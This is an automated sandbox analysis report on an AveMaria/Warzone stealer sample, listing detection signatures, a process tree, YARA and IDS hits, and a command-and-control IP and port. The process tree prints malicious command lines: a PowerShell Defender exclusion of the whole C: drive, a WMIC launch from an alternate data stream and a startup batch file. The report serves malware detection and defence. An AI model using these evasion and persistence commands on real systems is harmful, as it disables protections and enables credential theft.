Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507

Overview

General Information

Sample Name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
Analysis ID:631792
MD5:dabc6f0c75c134e5310ba3526adba833
SHA1:854ec103a64182c97e8f25e45da04889dbbbf3ff
SHA256:9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
Tags:exe
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates processes via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Drops script or batch files to the startup folder
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Contains functionality to create processes via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Hides user accounts
Contains functionality to steal e-mail passwords
Found evasive API chain checking for user administrative privileges
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates files in alternative data streams (ADS)
Found decision node followed by non-executed suspicious APIs
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Spawns drivers
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe (PID: 6324 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe" MD5: DABC6F0C75C134E5310BA3526ADBA833)
    • powershell.exe (PID: 6368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • images.exe (PID: 6516 cmdline: C:\ProgramData\images.exe MD5: DABC6F0C75C134E5310BA3526ADBA833)
      • powershell.exe (PID: 6732 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6840 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 7004 cmdline: wmic process call create '"C:\ProgramData:ApplicationData"' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • WmiPrvSE.exe (PID: 6700 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • WmiPrvSE.exe (PID: 6984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "23.227.202.157", "port": 8080}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x178c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x178c8:$c1: Elevation:Administrator!new:
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xdf0:$c1: Elevation:Administrator!new:
        Click to see the 42 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xd80:$c1: Elevation:Administrator!new:
        0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x191f0:$c1: Elevation:Administrator!new:
          Click to see the 81 entries

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Drops script at startup location
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, ProcessId: 6324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

          Snort Signatures

          Timestamp:192.168.2.323.227.202.1574974080802834979 05/22/22-12:33:29.604971
          SID:2834979
          Source Port:49740
          Destination Port:8080
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:23.227.202.157192.168.2.38080497402841903 05/22/22-12:33:29.434739
          SID:2841903
          Source Port:8080
          Destination Port:49740
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllAvira: detection malicious, Label: PUA/Remoteadmin.AR
          Found malware configuration
          Source: 4.2.images.exe.22e053f.3.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "23.227.202.157", "port": 8080}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeReversingLabs: Detection: 24%
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllVirustotal: Detection: 49%Perma Link
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 20%Perma Link
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 50%
          Source: C:\ProgramData:ApplicationDataReversingLabs: Detection: 24%
          Source: C:\ProgramData\images.exeReversingLabs: Detection: 24%
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\ProgramData:ApplicationDataJoe Sandbox ML: detected
          Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpackAvira: Label: TR/Redcap.ghjpt
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.3.images.exe.732cb8.3.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.3.images.exe.732cb8.7.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.2.images.exe.22e053f.3.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.2.images.exe.2ce0000.4.unpackAvira: Label: TR/Redcap.ghjpt
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CAFC CryptUnprotectData,LocalAlloc,LocalFree,0_2_02D1CAFC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,0_2_02D1B15E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,0_2_02D1A632
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CF58 LocalAlloc,BCryptDecrypt,LocalFree,0_2_02D1CF58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,0_2_02D1CCB4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,0_2_02D1CC54

          Exploits

          barindex
          Yara detected UACMe UAC Bypass tool
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdb source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdbUGP source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,0_2_02D2002B
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FD34 FindFirstFileExA,0_2_0040FD34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FE55 FindFirstFileExA,FindClose,0_2_0040FE55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,0_2_02D1FF27
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,0_2_02D19DF6

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2841903 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 23.227.202.157:8080 -> 192.168.2.3:49740
          Source: TrafficSnort IDS: 2834979 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.3:49740 -> 23.227.202.157:8080
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 23.227.202.157
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,0_2_02D127D3
          Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
          Source: global trafficTCP traffic: 192.168.2.3:49740 -> 23.227.202.157:8080
          Source: powershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
          Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: sqlmap.dll.4.drString found in binary or memory: http://stascorp.comDVarFileInfo$
          Source: powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
          Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1F23D recv,recv,0_2_02D1F23D
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Installs a global keyboard hook
          Source: C:\ProgramData\images.exeWindows user hook set: 0 keyboard low level C:\ProgramData\images.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D189D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,0_2_02D189D5
